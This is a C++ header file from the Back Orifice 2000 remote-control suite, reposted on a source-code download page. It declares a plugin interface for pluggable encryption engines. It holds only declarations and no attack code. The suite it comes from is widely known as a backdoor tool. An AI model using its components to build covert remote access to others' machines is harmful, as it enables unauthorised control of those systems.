encryption.h
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:3k
源码类别:

远程控制编程

开发平台:

WINDOWS

  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  3.     This file is free software, and not subject to GNU Public License
  4. restrictions; you can redistribute it and/or modify it in any way 
  5. you see fit. This file is suitable for inclusion in a derivative
  6. work, regardless of license on the work or availability of source code
  7. to the work. If you redistribute this file, you must leave this
  8. header intact.
  9.     
  10. This program is distributed in the hope that it will be useful,
  11.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  
  13. The author of this program may be contacted at dildog@l0pht.com. */
  14. #ifndef __INC_ENCRYPTION_H
  15. #define __INC_ENCRYPTION_H
  16. // Encryption interface
  17. #include<windows.h>
  18. #pragma pack(push, 1)
  19. typedef struct {
  20. int (__cdecl *pInsert)(void);
  21. int (__cdecl *pRemove)(void);
  22. char *(__cdecl *pQuery)(void);
  23. void *(__cdecl *pStartup)(void);
  24. int (__cdecl *pShutdown)(void *pInternal);
  25. int (__cdecl *pSetEncryptKey)(void *pInternal, char *svKey);
  26. int (__cdecl *pSetDecryptKey)(void *pInternal, char *svKey);
  27. char *(__cdecl *pGetEncryptKey)(void *pInternal);
  28. char *(__cdecl *pGetDecryptKey)(void *pInternal);
  29. BYTE *(__cdecl *pEncrypt)(void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen);
  30. BYTE *(__cdecl *pDecrypt)(void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen);
  31. int (__cdecl *pCreateNewKeys)(void *pInternal);
  32. void (__cdecl *pFree)(void *pInternal, BYTE *pBuffer);
  33. } ENCRYPTION_ENGINE;
  34. #pragma pack(pop)
  35. #define INVALID_ENCRYPTION_ENGINE ((ENCRYPTION_ENGINE *)NULL)
  36. #define MAX_ENCRYPTION_ENGINES 8
  37. class CEncryptionHandler {
  38. protected:
  39. ENCRYPTION_ENGINE *m_EncryptionEngine[MAX_ENCRYPTION_ENGINES];
  40. public:
  41. CEncryptionHandler();
  42. virtual ~CEncryptionHandler();
  43. virtual int Insert(ENCRYPTION_ENGINE *engine);
  44. virtual int GetEngineCount(void);
  45. virtual ENCRYPTION_ENGINE *GetEngine(int nEngine);
  46. virtual ENCRYPTION_ENGINE *GetEngineByID(char *svID);
  47. virtual char *Query(int nEngine);
  48. virtual int Remove(int nEngine);
  49. };
  50. class CEncryptionEngine {
  51. protected:
  52. ENCRYPTION_ENGINE *m_pEngine;
  53. void *m_pData;
  54. public:
  55. CEncryptionEngine(ENCRYPTION_ENGINE *pEngine);
  56. virtual ~CEncryptionEngine();
  57. virtual char *Query(void);
  58. virtual int Startup(void);
  59. virtual int Shutdown(void);
  60. virtual int SetEncryptKey(char *pKey);
  61. virtual int SetDecryptKey(char *pKey);
  62. virtual char *GetEncryptKey(void);
  63. virtual char *GetDecryptKey(void);
  64. virtual BYTE *Encrypt(BYTE *pBuffer,int nBufLen, int *pnOutBufLen);
  65. virtual BYTE *Decrypt(BYTE *pBuffer,int nBufLen, int *pnOutBufLen);
  66. virtual int CreateNewKeys(void);
  67. virtual void Free(BYTE *pBuffer);
  68. };
  69. #endif